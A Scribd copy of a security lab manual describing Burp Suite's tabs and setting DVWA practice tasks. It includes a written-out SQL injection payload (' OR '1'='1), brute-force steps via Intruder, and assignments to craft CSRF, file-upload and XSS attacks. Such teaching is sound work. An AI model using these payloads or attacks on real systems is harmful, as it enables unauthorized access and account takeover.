Scribd
Upload
17 views24 pages

Burp Manual

Lab 7 provides an overview of Burp Suite, a tool for web vulnerability scanning and penetration testing, detailing its various tabs and functionalities such as Dashboard, Target, Proxy, and Intruder. The lab includes practical tasks involving SQL injection, CSRF, XSS attacks, and using features like the Repeater and Comparer tabs to analyze and manipulate HTTP requests. Participants are encouraged to explore Burp Suite further to enhance their skills in identifying and exploiting web application vulnerabilities.

Uploaded by

k224728
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
17 views24 pages

Burp Manual

Lab 7 provides an overview of Burp Suite, a tool for web vulnerability scanning and penetration testing, detailing its various tabs and functionalities such as Dashboard, Target, Proxy, and Intruder. The lab includes practical tasks involving SQL injection, CSRF, XSS attacks, and using features like the Repeater and Comparer tabs to analyze and manipulate HTTP requests. Participants are encouraged to explore Burp Suite further to enhance their skills in identifying and exploiting web application vulnerabilities.

Uploaded by

k224728
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 24

Lab 7

Burp Suite is a widely used web vulnerability scanner and penetration testing tool developed by
PortSwigger. It provides a comprehensive suite of tools for security professionals to identify,
exploit, and remediate vulnerabilities in web applications.

Login both machine

Check connectivity with metasploit2 machine

sudo apt install openjdk-17-jdk

Burpsuite
1. Dashboard Tab

● Purpose: Centralized control for managing scans and displaying information.


● Key Features:
○ View ongoing scans, issues, and logs.
○ Monitor the status of different tools within Burp Suite.
● Usage:
○ Monitor the progress of active scans.
○ Review vulnerabilities and detailed reports.
2. Target Tab

● Purpose: Maps and organizes information about the application being tested.
● Key Features:
○ Site Map: Displays a hierarchical structure of the application's endpoints.
○ Target Scope: Allows you to define which endpoints should be tested.
● Usage:
○ Analyze all discovered URLs and endpoints.
○ Identify important files, directories, and query parameters.
○ Use it to focus your testing only on in-scope items.
Open dvwa app
username : admin and password: password

Follow the step for sqli attack


Successful SQL injection via manual and repeater
3. Proxy Tab

● Purpose: Intercepts and manipulates HTTP/S traffic between your browser and the
server.
● Key Features:
○ Intercept: Captures requests for manual modification.
○ HTTP History: Logs all traffic passing through the proxy.
○ Options: Configure proxy listeners and rules.
● Usage:
○ Modify requests in real-time using the Intercept feature.
○ Monitor and analyze all traffic in the HTTP History tab.
○ Adjust proxy settings to suit specific testing needs.
4. Sequencer Tab

● Purpose: Analyzes the randomness of tokens, such as session cookies.


● Key Features:
○ Collect tokens from the server.
○ Test token entropy and randomness.
● Usage:
○ Check if session cookies or CSRF tokens are predictable.
○ Ensure sufficient randomness in security-critical tokens.
5. Intruder Tab

● Purpose: Automates customized attacks, such as brute force or fuzzing.


● Key Features:
○ Positions: Defines which part of the request should be attacked.
○ Payloads: Configures input values for the attack.
○ Options: Fine-tunes attack settings like threading and session handling.
● Usage:
○ Perform brute force attacks on login forms.
○ Test parameter values with SQL injection or XSS payloads.
○ Fuzz endpoints to find vulnerabilities.

Send to intruder
Go to intruder tab

Select auto in payload position


Start brute forcer attack
6. Repeater Tab
● Purpose: Manually modify and resend individual HTTP requests.
● Key Features:
○ Send and analyze responses for different request variations.
○ View raw requests and responses side-by-side.
● Usage:
○ Test payloads like ' OR '1'='1 for SQL Injection manually.
○ Explore how different inputs affect server behavior.
○ Use it to verify vulnerabilities without automation.

7. Decoder Tab

● Purpose: Encodes and decodes data in various formats.


● Key Features:
○ Supports encoding/decoding for Base64, URL, HTML, and more.
○ Allows manual or automated decoding.
● Usage:
○ Decode Base64 strings from responses or requests.
○ Encode payloads in formats like URL or Hex before sending them.
○ Understand obfuscated parameters in traffic.
8. Comparer Tab

● Purpose: Compares requests, responses, or any other text data.


● Key Features:
○ Highlights differences between two pieces of data.
○ Useful for analyzing subtle changes.
● Usage:
○ Compare responses from different payloads to spot patterns.
○ Analyze how server responses change based on input.

9. Scanner Tab (Burp Suite Professional Only)

● Purpose: Automatically scans for vulnerabilities in the target application.


● Key Features:
○ Detects common vulnerabilities like XSS, SQLi, and CSRF.
○ Provides detailed reports of findings.
● Usage:
○ Run automated scans on specific endpoints.
○ Use it to find low-hanging vulnerabilities quickly.

10. Logger Tab


● Purpose: Logs all traffic flowing through Burp Suite.
● Key Features:
○ Provides a simple, real-time log of HTTP requests and responses.
● Usage:
○ Review all requests and responses during a session.
○ Use it as a quick reference for debugging issues.

http://ip address/dvwa/vulnerabilities/csrf/

Note: if I want, I attach screen shot of these tasks here but I want you to explore burpsuit and
remember if you don’t challenge yourself then you will never improve.

TASK 1
Create a CSRF attack that silently changes the admin’s password on DVWA to rollnoabc
when they open a malicious link. Also compare the changes in compare tab of burpsuit what
you will find

TASK 2
Perform upload attack on DVWA

TASK 3
Perform XSS attack on DVWA

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy